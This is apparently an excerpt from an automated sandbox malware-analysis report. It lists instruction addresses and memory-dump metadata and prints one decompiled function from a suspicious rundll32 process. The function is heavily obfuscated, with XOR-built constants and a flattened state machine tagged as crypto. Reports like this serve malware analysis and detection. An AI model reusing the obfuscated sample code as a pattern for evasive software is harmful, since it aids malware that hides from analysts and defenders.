                                                                                                                                    0x002c33db
                                                                                                                                    0x002c33e0
                                                                                                                                    0x002c33e8
                                                                                                                                    0x002c33f0
                                                                                                                                    0x002c33f8
                                                                                                                                    0x002c3403
                                                                                                                                    0x002c340e
                                                                                                                                    0x002c3416
                                                                                                                                    0x002c3421
                                                                                                                                    0x002c342d
                                                                                                                                    0x002c3430
                                                                                                                                    0x002c3434
                                                                                                                                    0x002c343c
                                                                                                                                    0x002c3444
                                                                                                                                    0x002c344c
                                                                                                                                    0x002c3454
                                                                                                                                    0x002c3459
                                                                                                                                    0x002c3461
                                                                                                                                    0x002c3466
                                                                                                                                    0x002c346e
                                                                                                                                    0x002c3479
                                                                                                                                    0x002c3484
                                                                                                                                    0x002c348f
                                                                                                                                    0x002c349a
                                                                                                                                    0x002c34a5
                                                                                                                                    0x002c34ad
                                                                                                                                    0x002c34b8
                                                                                                                                    0x002c34c3
                                                                                                                                    0x002c34ce
                                                                                                                                    0x002c34d9
                                                                                                                                    0x002c34e4
                                                                                                                                    0x002c34ec
                                                                                                                                    0x002c34f1
                                                                                                                                    0x002c34f6
                                                                                                                                    0x002c34fe
                                                                                                                                    0x002c3506
                                                                                                                                    0x002c3511
                                                                                                                                    0x002c351c
                                                                                                                                    0x002c3527
                                                                                                                                    0x002c3532
                                                                                                                                    0x002c353d
                                                                                                                                    0x002c354a
                                                                                                                                    0x002c3555
                                                                                                                                    0x002c355a
                                                                                                                                    0x002c3565
                                                                                                                                    0x002c356a
                                                                                                                                    0x002c3575
                                                                                                                                    0x002c3580
                                                                                                                                    0x002c3588
                                                                                                                                    0x002c3593
                                                                                                                                    0x002c359e
                                                                                                                                    0x002c35a9
                                                                                                                                    0x002c35b4
                                                                                                                                    0x002c35bf
                                                                                                                                    0x002c35d4
                                                                                                                                    0x002c35d5
                                                                                                                                    0x002c35e0
                                                                                                                                    0x002c35e7
                                                                                                                                    0x002c35f2
                                                                                                                                    0x002c35fd
                                                                                                                                    0x002c3608
                                                                                                                                    0x002c3613
                                                                                                                                    0x002c361e
                                                                                                                                    0x002c3629
                                                                                                                                    0x002c3634
                                                                                                                                    0x002c363c
                                                                                                                                    0x002c3647
                                                                                                                                    0x002c3652
                                                                                                                                    0x002c365f
                                                                                                                                    0x002c3668
                                                                                                                                    0x002c366c
                                                                                                                                    0x002c3674
                                                                                                                                    0x002c367c
                                                                                                                                    0x002c3687
                                                                                                                                    0x002c3692
                                                                                                                                    0x002c369d
                                                                                                                                    0x002c36b0
                                                                                                                                    0x002c36b7
                                                                                                                                    0x002c36c2
                                                                                                                                    0x002c36cd
                                                                                                                                    0x002c36d8
                                                                                                                                    0x002c36e3
                                                                                                                                    0x002c36ee
                                                                                                                                    0x002c36f9
                                                                                                                                    0x002c3701
                                                                                                                                    0x002c370c
                                                                                                                                    0x002c3714
                                                                                                                                    0x002c3722
                                                                                                                                    0x002c3726
                                                                                                                                    0x002c372e
                                                                                                                                    0x002c3736
                                                                                                                                    0x002c3741
                                                                                                                                    0x002c374c
                                                                                                                                    0x002c3757
                                                                                                                                    0x002c3757
                                                                                                                                    0x002c3757
                                                                                                                                    0x002c375c
                                                                                                                                    0x002c3761
                                                                                                                                    0x002c3766
                                                                                                                                    0x002c3766
                                                                                                                                    0x002c3766
                                                                                                                                    0x002c3766
                                                                                                                                    0x002c3768
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c376e
                                                                                                                                    0x002c392a
                                                                                                                                    0x002c3936
                                                                                                                                    0x002c3941
                                                                                                                                    0x002c3946
                                                                                                                                    0x002c394f
                                                                                                                                    0x002c3951
                                                                                                                                    0x002c395c
                                                                                                                                    0x002c3973
                                                                                                                                    0x002c398c
                                                                                                                                    0x002c3998
                                                                                                                                    0x002c39b5
                                                                                                                                    0x002c39c3
                                                                                                                                    0x002c39d1
                                                                                                                                    0x002c39e0
                                                                                                                                    0x002c39fd
                                                                                                                                    0x002c3a1c
                                                                                                                                    0x002c3a23
                                                                                                                                    0x002c3a2f
                                                                                                                                    0x002c3a43
                                                                                                                                    0x002c3a46
                                                                                                                                    0x002c3a58
                                                                                                                                    0x002c3a5f
                                                                                                                                    0x00000000
                                                                                                                                    0x002c3774
                                                                                                                                    0x002c377a
                                                                                                                                    0x002c3907
                                                                                                                                    0x002c391d
                                                                                                                                    0x002c3923
                                                                                                                                    0x002c3757
                                                                                                                                    0x002c3757
                                                                                                                                    0x002c3757
                                                                                                                                    0x002c375c
                                                                                                                                    0x002c3761
                                                                                                                                    0x00000000
                                                                                                                                    0x002c3761
                                                                                                                                    0x002c3780
                                                                                                                                    0x002c3786
                                                                                                                                    0x002c38fd
                                                                                                                                    0x00000000
                                                                                                                                    0x002c378c
                                                                                                                                    0x002c378e
                                                                                                                                    0x002c3829
                                                                                                                                    0x002c3835
                                                                                                                                    0x002c3845
                                                                                                                                    0x002c3847
                                                                                                                                    0x002c384b
                                                                                                                                    0x002c385a
                                                                                                                                    0x002c3868
                                                                                                                                    0x002c3869
                                                                                                                                    0x002c3870
                                                                                                                                    0x002c38a5
                                                                                                                                    0x002c38bb
                                                                                                                                    0x002c38cb
                                                                                                                                    0x002c38d0
                                                                                                                                    0x002c38d3
                                                                                                                                    0x002c38d7
                                                                                                                                    0x002c38e0
                                                                                                                                    0x002c38d9
                                                                                                                                    0x002c38db
                                                                                                                                    0x002c38dd
                                                                                                                                    0x002c38dd
                                                                                                                                    0x002c38f2
                                                                                                                                    0x00000000
                                                                                                                                    0x002c3794
                                                                                                                                    0x002c3794
                                                                                                                                    0x002c3796
                                                                                                                                    0x002c379c
                                                                                                                                    0x002c37a8
                                                                                                                                    0x002c37b3
                                                                                                                                    0x002c37b9
                                                                                                                                    0x002c37e4
                                                                                                                                    0x002c37fe
                                                                                                                                    0x002c381c
                                                                                                                                    0x002c381f
                                                                                                                                    0x002c3b98
                                                                                                                                    0x002c3b98
                                                                                                                                    0x002c3b9b
                                                                                                                                    0x002c3b9b
                                                                                                                                    0x002c3ba0
                                                                                                                                    0x002c3ba5
                                                                                                                                    0x002c3baa
                                                                                                                                    0x002c3baa
                                                                                                                                    0x002c3796
                                                                                                                                    0x00000000
                                                                                                                                    0x002c378e
                                                                                                                                    0x002c3786
                                                                                                                                    0x002c377a
                                                                                                                                    0x002c3aa7
                                                                                                                                    0x002c3ab1
                                                                                                                                    0x002c3ab1
                                                                                                                                    0x002c3a69
                                                                                                                                    0x002c3a6f
                                                                                                                                    0x002c3aef
                                                                                                                                    0x002c3afb
                                                                                                                                    0x002c3b03
                                                                                                                                    0x002c3b08
                                                                                                                                    0x002c3b16
                                                                                                                                    0x002c3b24
                                                                                                                                    0x002c3b3e
                                                                                                                                    0x002c3b68
                                                                                                                                    0x002c3b76
                                                                                                                                    0x002c3b79
                                                                                                                                    0x002c3b8e
                                                                                                                                    0x002c3b93
                                                                                                                                    0x00000000
                                                                                                                                    0x002c3a71
                                                                                                                                    0x002c3a71
                                                                                                                                    0x002c3a73
                                                                                                                                    0x002c3ac7
                                                                                                                                    0x002c3acd
                                                                                                                                    0x002c3ace
                                                                                                                                    0x002c3ad9
                                                                                                                                    0x002c3add
                                                                                                                                    0x002c3ae2
                                                                                                                                    0x002c3ae4
                                                                                                                                    0x002c3ae7
                                                                                                                                    0x00000000
                                                                                                                                    0x002c3a75
                                                                                                                                    0x002c3a75
                                                                                                                                    0x002c3a77
                                                                                                                                    0x00000000
                                                                                                                                    0x002c3a7d
                                                                                                                                    0x002c3a7d
                                                                                                                                    0x002c3a9d
                                                                                                                                    0x002c3aa2
                                                                                                                                    0x002c3a77
                                                                                                                                    0x002c3a73
                                                                                                                                    0x00000000
                                                                                                                                    0x002c3baf
                                                                                                                                    0x002c3baf
                                                                                                                                    0x00000000
                                                                                                                                    0x002c3bbb

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "$ $(|?|$;]z$='mm$?$I*5$J&9$J&9$LCl$c@9$lT&$t1 $Y($>
                                                                                                                                    • API String ID: 0-1427316221
                                                                                                                                    • Opcode ID: ffe9e2fc3f28048f5b75d353ccf2b13884ac23de82ddb087ee2cdbb94733d9d5
                                                                                                                                    • Instruction ID: b4178dea05b05a3d662dcfe57b273e05c749e37b76ac7454d1e9b4b46837570f
                                                                                                                                    • Opcode Fuzzy Hash: ffe9e2fc3f28048f5b75d353ccf2b13884ac23de82ddb087ee2cdbb94733d9d5
                                                                                                                                    • Instruction Fuzzy Hash: 4072EF715093818FD3B8CF25C58AB9BBBE1FBC5304F108A1DE1DA96260DBB58959CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DAE6D Relevance: 19.3, Strings: 15, Instructions: 522COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002DAE6D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				void* _t537;
				void* _t566;
				void* _t567;
				intOrPtr _t573;
				void* _t575;
				void* _t577;
				void* _t585;
				void* _t588;
				void* _t594;
				void* _t596;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t608;
				signed int _t609;
				signed int _t610;
				void* _t611;
				void* _t633;
				void* _t660;
				void* _t675;
				intOrPtr _t677;
				intOrPtr _t680;
				signed int* _t682;
				void* _t685;

				_push(_a20);
				_t677 = __edx;
				_push(_a16);
				_v24 = __edx;
				_push(0x20);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t537);
				_v8 = 0x673696;
				_t680 = 0;
				_v4 = 0;
				_t682 =  &(( &_v272)[7]);
				_v144 = 0xf00d33;
				_v144 = _v144 | 0x228e8b2e;
				_t596 = 0x1d3710;
				_v144 = _v144 >> 8;
				_v144 = _v144 ^ 0x0022fe8f;
				_v244 = 0xde08aa;
				_t603 = 0x17;
				_v244 = _v244 / _t603;
				_v244 = _v244 + 0xffff54ea;
				_v244 = _v244 << 0xa;
				_v244 = _v244 ^ 0x23f0fc00;
				_v224 = 0x36cb35;
				_v224 = _v224 | 0xc39aec51;
				_v224 = _v224 + 0x9146;
				_t604 = 0x62;
				_v224 = _v224 * 0x70;
				_v224 = _v224 ^ 0xa3c851d0;
				_v116 = 0xf2e64b;
				_v116 = _v116 << 5;
				_v116 = _v116 ^ 0x1e5cc960;
				_v248 = 0x2b7d5f;
				_t43 =  &_v248; // 0x2b7d5f
				_v248 =  *_t43 * 0x53;
				_v248 = _v248 + 0x8561;
				_v248 = _v248 | 0xae4dc352;
				_v248 = _v248 ^ 0xae5feb7e;
				_v80 = 0xe6036b;
				_v80 = _v80 * 0xb;
				_v80 = _v80 ^ 0x09e22599;
				_v240 = 0x5b8b4f;
				_v240 = _v240 + 0xffffe1e0;
				_v240 = _v240 ^ 0xb7b7812a;
				_v240 = _v240 + 0xffff41e0;
				_v240 = _v240 ^ 0xb7ec2de5;
				_v232 = 0xf81ab6;
				_v232 = _v232 ^ 0xa56b9217;
				_v232 = _v232 | 0x431a55e8;
				_v232 = _v232 << 7;
				_v232 = _v232 ^ 0xcdeef480;
				_v184 = 0xddfe73;
				_v184 = _v184 * 0x26;
				_v184 = _v184 << 8;
				_v184 = _v184 ^ 0xf3c51200;
				_v120 = 0x644fb5;
				_v120 = _v120 >> 6;
				_v120 = _v120 / _t604;
				_v120 = _v120 ^ 0x00000418;
				_v60 = 0xc6ff9f;
				_v60 = _v60 ^ 0x0d96ce7d;
				_v60 = _v60 ^ 0x0d5031e2;
				_v204 = 0xeedb74;
				_v204 = _v204 >> 0xb;
				_v204 = _v204 >> 0xa;
				_v204 = _v204 | 0xba569879;
				_v204 = _v204 ^ 0xba56987f;
				_v268 = 0x9a0618;
				_v268 = _v268 ^ 0x10270239;
				_v268 = _v268 ^ 0x733075d3;
				_t605 = 0x16;
				_v268 = _v268 / _t605;
				_v268 = _v268 ^ 0x04865c22;
				_v160 = 0x655fad;
				_v160 = _v160 >> 3;
				_v160 = _v160 >> 4;
				_v160 = _v160 ^ 0x0009a8dc;
				_v272 = 0x9202;
				_v272 = _v272 | 0xfb135803;
				_t606 = 0x41;
				_v272 = _v272 * 0x2c;
				_v272 = _v272 << 1;
				_v272 = _v272 ^ 0x4ed07035;
				_v100 = 0x536289;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xa6cd28cf;
				_v108 = 0xf021d8;
				_v108 = _v108 ^ 0x8f8b6ed2;
				_v108 = _v108 ^ 0x8f701d8c;
				_v152 = 0xcba027;
				_v152 = _v152 ^ 0xce0cd109;
				_v152 = _v152 | 0x7dfb06f6;
				_v152 = _v152 ^ 0xfff88f5e;
				_v252 = 0xf09c41;
				_v252 = _v252 + 0x8e2a;
				_v252 = _v252 << 3;
				_v252 = _v252 | 0xdb831f2c;
				_v252 = _v252 ^ 0xdf846234;
				_v260 = 0x3d692f;
				_v260 = _v260 << 2;
				_v260 = _v260 | 0xbfb4a027;
				_v260 = _v260 + 0x643;
				_v260 = _v260 ^ 0xbffb0fde;
				_v92 = 0x80bca7;
				_v92 = _v92 >> 0xa;
				_v92 = _v92 ^ 0x00038c1c;
				_v228 = 0xbbbc43;
				_v228 = _v228 | 0x61282476;
				_v228 = _v228 + 0xffff6ee2;
				_v228 = _v228 * 0x69;
				_v228 = _v228 ^ 0x15ccd750;
				_v236 = 0xc2062f;
				_v236 = _v236 | 0xf7f3ef67;
				_v236 = _v236 * 0x5c;
				_v236 = _v236 ^ 0x1ba01eed;
				_v128 = 0xa773bc;
				_v128 = _v128 << 0x10;
				_v128 = _v128 | 0xe162daa5;
				_v128 = _v128 ^ 0xf3f36b57;
				_v136 = 0x3287f3;
				_v136 = _v136 / _t606;
				_v136 = _v136 >> 9;
				_v136 = _v136 ^ 0x000c37d1;
				_v104 = 0x8d5fef;
				_v104 = _v104 + 0xffff56ea;
				_v104 = _v104 ^ 0x008f942b;
				_v44 = 0xd6bac6;
				_v44 = _v44 * 0x7f;
				_v44 = _v44 ^ 0x6a80c639;
				_v148 = 0xa4165e;
				_v148 = _v148 * 0x13;
				_v148 = _v148 | 0x84e82f79;
				_v148 = _v148 ^ 0x8cef9599;
				_v96 = 0xfc4916;
				_v96 = _v96 + 0xffff0795;
				_v96 = _v96 ^ 0x00f5cebb;
				_v132 = 0xd5d7c2;
				_v132 = _v132 >> 0x10;
				_v132 = _v132 << 0xd;
				_v132 = _v132 ^ 0x0010cc3c;
				_v264 = 0xf6e8cb;
				_v264 = _v264 + 0x6576;
				_v264 = _v264 + 0x7b15;
				_v264 = _v264 + 0x6b9c;
				_v264 = _v264 ^ 0x00fe3ec7;
				_v208 = 0x3a8541;
				_v208 = _v208 | 0x57459f57;
				_v208 = _v208 ^ 0x66631a8c;
				_v208 = _v208 | 0x178bfabb;
				_v208 = _v208 ^ 0x379a2cb6;
				_v56 = 0x33c5e6;
				_v56 = _v56 + 0x441;
				_v56 = _v56 ^ 0x0035e6a0;
				_v172 = 0x2bd4df;
				_v172 = _v172 + 0xda1f;
				_v172 = _v172 + 0x8171;
				_v172 = _v172 ^ 0x002cd084;
				_v48 = 0x796d26;
				_v48 = _v48 + 0xffff3152;
				_v48 = _v48 ^ 0x00766b67;
				_v88 = 0xfc738c;
				_v88 = _v88 << 0xe;
				_v88 = _v88 ^ 0x1ce8da45;
				_v140 = 0x79fdd0;
				_v140 = _v140 >> 0xe;
				_v140 = _v140 * 0x78;
				_v140 = _v140 ^ 0x000f2c53;
				_v64 = 0xd0b1f6;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x000411a2;
				_v200 = 0xaa2240;
				_v200 = _v200 | 0x35f3f2d4;
				_v200 = _v200 + 0x4147;
				_v200 = _v200 + 0xffff1702;
				_v200 = _v200 ^ 0x35f16a60;
				_v52 = 0x980f89;
				_v52 = _v52 ^ 0xc15a5b47;
				_v52 = _v52 ^ 0xc1c323e9;
				_v216 = 0xb7a8b5;
				_v216 = _v216 >> 3;
				_v216 = _v216 ^ 0xa2f7ad91;
				_v216 = _v216 + 0xfffff0a8;
				_v216 = _v216 ^ 0xa2ec62b8;
				_v72 = 0x73581d;
				_v72 = _v72 + 0xffffc838;
				_v72 = _v72 ^ 0x00777119;
				_v164 = 0x873053;
				_v164 = _v164 ^ 0xefe323e3;
				_v164 = _v164 | 0xd91bba05;
				_v164 = _v164 ^ 0xff705bac;
				_v40 = 0xf8d5df;
				_v40 = _v40 ^ 0x79f853d7;
				_v40 = _v40 ^ 0x79053437;
				_v192 = 0x180af0;
				_v192 = _v192 + 0xffff4c14;
				_v192 = _v192 << 8;
				_v192 = _v192 + 0x2aad;
				_v192 = _v192 ^ 0x175759c3;
				_v256 = 0x23b549;
				_v256 = _v256 + 0x5eb6;
				_v256 = _v256 | 0xffb7bbff;
				_v256 = _v256 ^ 0xffb807e9;
				_v176 = 0xc1fdd5;
				_v176 = _v176 >> 0xc;
				_v176 = _v176 | 0x5151af8d;
				_v176 = _v176 ^ 0x515c7a4b;
				_v112 = 0xec5780;
				_v112 = _v112 ^ 0x97b4c021;
				_v112 = _v112 ^ 0x9750bd7e;
				_v180 = 0x591b41;
				_v180 = _v180 + 0x207e;
				_v180 = _v180 + 0xffffc81d;
				_v180 = _v180 ^ 0x005ca8dc;
				_v68 = 0x76fd1d;
				_t675 = 0x5c52c4a;
				_v68 = _v68 | 0x9e2d4356;
				_v68 = _v68 ^ 0x9e728261;
				_v76 = 0xf22a3;
				_v76 = _v76 | 0x9c703035;
				_v76 = _v76 ^ 0x9c7b5f20;
				_v220 = 0x3decab;
				_v220 = _v220 << 8;
				_v220 = _v220 ^ 0x53082a5e;
				_v220 = _v220 >> 0xd;
				_v220 = _v220 ^ 0x0004d715;
				_v84 = 0x6eb476;
				_v84 = _v84 << 0xd;
				_v84 = _v84 ^ 0xd68135de;
				_v124 = 0x458e11;
				_v124 = _v124 | 0x336f5b57;
				_t607 = 0x43;
				_v124 = _v124 / _t607;
				_v124 = _v124 ^ 0x00c97d17;
				_v156 = 0x7cba2c;
				_t608 = 0x4b;
				_v156 = _v156 / _t608;
				_v156 = _v156 | 0x0b494d21;
				_v156 = _v156 ^ 0x0b48f5d9;
				_v36 = 0x519404;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0x5195ba3f;
				_v168 = 0xf13e55;
				_v168 = _v168 | 0x95edbe5f;
				_v168 = _v168 ^ 0xd6548190;
				_v168 = _v168 ^ 0x43a3dbfd;
				_v188 = 0xdd4a71;
				_v188 = _v188 + 0xffff5bb0;
				_v188 = _v188 >> 0xb;
				_v188 = _v188 >> 6;
				_v188 = _v188 ^ 0x000a03ec;
				_v196 = 0x58b29f;
				_t609 = 0x22;
				_v196 = _v196 / _t609;
				_v196 = _v196 + 0xffff713e;
				_v196 = _v196 + 0xffff146a;
				_v196 = _v196 ^ 0x000c9f67;
				_v212 = 0xc056c;
				_t610 = 0x45;
				_v212 = _v212 * 0x51;
				_v212 = _v212 >> 0xc;
				_v212 = _v212 / _t610;
				_v212 = _v212 ^ 0x0007774b;
				while(1) {
					L1:
					_t566 = 0x6c6f684;
					while(1) {
						L2:
						_t611 = 0x92c3a26;
						while(1) {
							L3:
							do {
								while(1) {
									L4:
									_t685 = _t596 - _t675;
									if(_t685 > 0) {
										break;
									}
									if(_t685 == 0) {
										E002D6BC6(_v124, _v32, _v156);
										_t596 = 0x4bc1ff4;
										goto L1;
									} else {
										if(_t596 == 0x1d3710) {
											_t596 = 0x6d0da1a;
											continue;
										} else {
											if(_t596 == 0x19992af) {
												_push(_t611);
												_push(_t611);
												_t573 = E002C7FF2(_v16);
												__eflags = _t573;
												_v20 = _t573;
												_t660 = 0x19c2787;
												_t596 =  !=  ? 0x19c2787 : 0x87f6c1b;
												_t566 = 0x6c6f684;
												_t611 = 0x92c3a26;
												continue;
											} else {
												if(_t596 == _t660) {
													_t575 = E002D7B05(_v16,  &_v32, _v28, _v216, _v72, _v164, _v248, _v40, _v80, _t611, _v192, _v256, _v20);
													_t682 =  &(_t682[0xc]);
													__eflags = _t575 - _v240;
													_t611 = 0x92c3a26;
													_t566 = 0x6c6f684;
													_t596 =  ==  ? 0x92c3a26 : 0x4bc1ff4;
													goto L3;
												} else {
													if(_t596 == 0x489cb15) {
														_push(_v148);
														_push(_v44);
														_t577 = E002DDCF7(_v104, 0x2c18b4, __eflags);
														_pop(_t633);
														__eflags = E002E0B68(_t577,  &_v12, _v224, _v96, _t633,  &_v16, _v132, _v264, _v208, _v56, _v28, _v172) - _v116;
														_t596 =  ==  ? 0x19992af : 0x87f6c1b;
														E002CA8B0(_v48, _t577, _v88);
														_t677 = _v24;
														_t682 =  &(_t682[0xb]);
														L24:
														_t566 = 0x6c6f684;
														_t611 = 0x92c3a26;
														_t660 = 0x19c2787;
														goto L25;
													} else {
														if(_t596 != 0x4bc1ff4) {
															goto L25;
														} else {
															E002D8519(_v36, _v168, _v20);
															_t596 = 0x87f6c1b;
															while(1) {
																L1:
																_t566 = 0x6c6f684;
																L2:
																_t611 = 0x92c3a26;
																L3:
																goto L4;
															}
														}
													}
												}
											}
										}
									}
									L28:
									return _t680;
								}
								__eflags = _t596 - _t566;
								if(_t596 == _t566) {
									_t567 = E002D828A(_v68, _v76, _v220, _t677, _v120, 0x20, _v84, _v32);
									_t682 =  &(_t682[6]);
									_t596 = _t675;
									__eflags = _t567 - _v60;
									_t680 =  ==  ? 1 : _t680;
									goto L24;
								} else {
									__eflags = _t596 - 0x6d0da1a;
									if(__eflags == 0) {
										_push(_v272);
										_push(_v160);
										_t585 = E002DDCF7(_v268, 0x2c1884, __eflags);
										_push(_v152);
										_push(_v108);
										_t588 = E002C9462(_t585, _v260,  &_v28, E002DDCF7(_v100, 0x2c1814, __eflags), _v92, _v144);
										_t682 =  &(_t682[9]);
										__eflags = _t588 - _v244;
										_t596 =  ==  ? 0x489cb15 : 0x822e036;
										E002CA8B0(_v228, _t585, _v236);
										E002CA8B0(_v128, _t586, _v136);
										_t677 = _v24;
										_t675 = 0x5c52c4a;
										goto L24;
									} else {
										__eflags = _t596 - 0x87f6c1b;
										if(_t596 == 0x87f6c1b) {
											E002C957D(_v28, _v188, _v196, _v204, _v212);
										} else {
											__eflags = _t596 - _t611;
											if(_t596 != _t611) {
												goto L25;
											} else {
												_t594 = E002CA81D(_v32, _a4, _v176, _v112, _v232, _a20, _v180);
												_t682 =  &(_t682[5]);
												__eflags = _t594 - _v184;
												_t566 = 0x6c6f684;
												_t596 =  ==  ? 0x6c6f684 : _t675;
												goto L2;
											}
										}
									}
								}
								goto L28;
								L25:
								__eflags = _t596 - 0x822e036;
							} while (__eflags != 0);
							goto L28;
						}
					}
				}
			}

































































































                                                                                                                                    0x002dae77
                                                                                                                                    0x002dae7e
                                                                                                                                    0x002dae80
                                                                                                                                    0x002dae87
                                                                                                                                    0x002dae8e
                                                                                                                                    0x002dae90
                                                                                                                                    0x002dae97
                                                                                                                                    0x002dae9e
                                                                                                                                    0x002dae9f
                                                                                                                                    0x002daea0
                                                                                                                                    0x002daea5
                                                                                                                                    0x002daeb0
                                                                                                                                    0x002daeb2
                                                                                                                                    0x002daeb9
                                                                                                                                    0x002daebc
                                                                                                                                    0x002daec9
                                                                                                                                    0x002daed4
                                                                                                                                    0x002daed9
                                                                                                                                    0x002daee1
                                                                                                                                    0x002daeec
                                                                                                                                    0x002daefa
                                                                                                                                    0x002daeff
                                                                                                                                    0x002daf05
                                                                                                                                    0x002daf0d
                                                                                                                                    0x002daf12
                                                                                                                                    0x002daf1a
                                                                                                                                    0x002daf22
                                                                                                                                    0x002daf2a
                                                                                                                                    0x002daf37
                                                                                                                                    0x002daf38
                                                                                                                                    0x002daf3c
                                                                                                                                    0x002daf44
                                                                                                                                    0x002daf4f
                                                                                                                                    0x002daf57
                                                                                                                                    0x002daf62
                                                                                                                                    0x002daf6a
                                                                                                                                    0x002daf6f
                                                                                                                                    0x002daf73
                                                                                                                                    0x002daf7b
                                                                                                                                    0x002daf83
                                                                                                                                    0x002daf8b
                                                                                                                                    0x002daf9e
                                                                                                                                    0x002dafa5
                                                                                                                                    0x002dafb0
                                                                                                                                    0x002dafb8
                                                                                                                                    0x002dafc0
                                                                                                                                    0x002dafc8
                                                                                                                                    0x002dafd0
                                                                                                                                    0x002dafd8
                                                                                                                                    0x002dafe0
                                                                                                                                    0x002dafe8
                                                                                                                                    0x002daff0
                                                                                                                                    0x002daff5
                                                                                                                                    0x002daffd
                                                                                                                                    0x002db00a
                                                                                                                                    0x002db00e
                                                                                                                                    0x002db013
                                                                                                                                    0x002db01b
                                                                                                                                    0x002db026
                                                                                                                                    0x002db037
                                                                                                                                    0x002db03e
                                                                                                                                    0x002db049
                                                                                                                                    0x002db054
                                                                                                                                    0x002db05f
                                                                                                                                    0x002db06a
                                                                                                                                    0x002db072
                                                                                                                                    0x002db077
                                                                                                                                    0x002db07e
                                                                                                                                    0x002db086
                                                                                                                                    0x002db08e
                                                                                                                                    0x002db096
                                                                                                                                    0x002db09e
                                                                                                                                    0x002db0ac
                                                                                                                                    0x002db0b1
                                                                                                                                    0x002db0b7
                                                                                                                                    0x002db0bf
                                                                                                                                    0x002db0ca
                                                                                                                                    0x002db0d2
                                                                                                                                    0x002db0da
                                                                                                                                    0x002db0e5
                                                                                                                                    0x002db0ed
                                                                                                                                    0x002db0fa
                                                                                                                                    0x002db0fb
                                                                                                                                    0x002db0ff
                                                                                                                                    0x002db103
                                                                                                                                    0x002db10b
                                                                                                                                    0x002db116
                                                                                                                                    0x002db11e
                                                                                                                                    0x002db129
                                                                                                                                    0x002db134
                                                                                                                                    0x002db13f
                                                                                                                                    0x002db14a
                                                                                                                                    0x002db155
                                                                                                                                    0x002db160
                                                                                                                                    0x002db16b
                                                                                                                                    0x002db176
                                                                                                                                    0x002db17e
                                                                                                                                    0x002db186
                                                                                                                                    0x002db18b
                                                                                                                                    0x002db193
                                                                                                                                    0x002db19b
                                                                                                                                    0x002db1a3
                                                                                                                                    0x002db1a8
                                                                                                                                    0x002db1b0
                                                                                                                                    0x002db1b8
                                                                                                                                    0x002db1c0
                                                                                                                                    0x002db1cb
                                                                                                                                    0x002db1d3
                                                                                                                                    0x002db1de
                                                                                                                                    0x002db1e6
                                                                                                                                    0x002db1ee
                                                                                                                                    0x002db1fb
                                                                                                                                    0x002db1ff
                                                                                                                                    0x002db207
                                                                                                                                    0x002db20f
                                                                                                                                    0x002db21c
                                                                                                                                    0x002db220
                                                                                                                                    0x002db228
                                                                                                                                    0x002db233
                                                                                                                                    0x002db23b
                                                                                                                                    0x002db246
                                                                                                                                    0x002db251
                                                                                                                                    0x002db265
                                                                                                                                    0x002db26c
                                                                                                                                    0x002db274
                                                                                                                                    0x002db27f
                                                                                                                                    0x002db28a
                                                                                                                                    0x002db295
                                                                                                                                    0x002db2a0
                                                                                                                                    0x002db2b3
                                                                                                                                    0x002db2ba
                                                                                                                                    0x002db2c5
                                                                                                                                    0x002db2d8
                                                                                                                                    0x002db2df
                                                                                                                                    0x002db2ea
                                                                                                                                    0x002db2f5
                                                                                                                                    0x002db300
                                                                                                                                    0x002db30b
                                                                                                                                    0x002db316
                                                                                                                                    0x002db321
                                                                                                                                    0x002db329
                                                                                                                                    0x002db331
                                                                                                                                    0x002db33c
                                                                                                                                    0x002db344
                                                                                                                                    0x002db34c
                                                                                                                                    0x002db354
                                                                                                                                    0x002db35c
                                                                                                                                    0x002db364
                                                                                                                                    0x002db36c
                                                                                                                                    0x002db374
                                                                                                                                    0x002db37c
                                                                                                                                    0x002db384
                                                                                                                                    0x002db38c
                                                                                                                                    0x002db397
                                                                                                                                    0x002db3a2
                                                                                                                                    0x002db3ad
                                                                                                                                    0x002db3b5
                                                                                                                                    0x002db3bd
                                                                                                                                    0x002db3c5
                                                                                                                                    0x002db3cd
                                                                                                                                    0x002db3d8
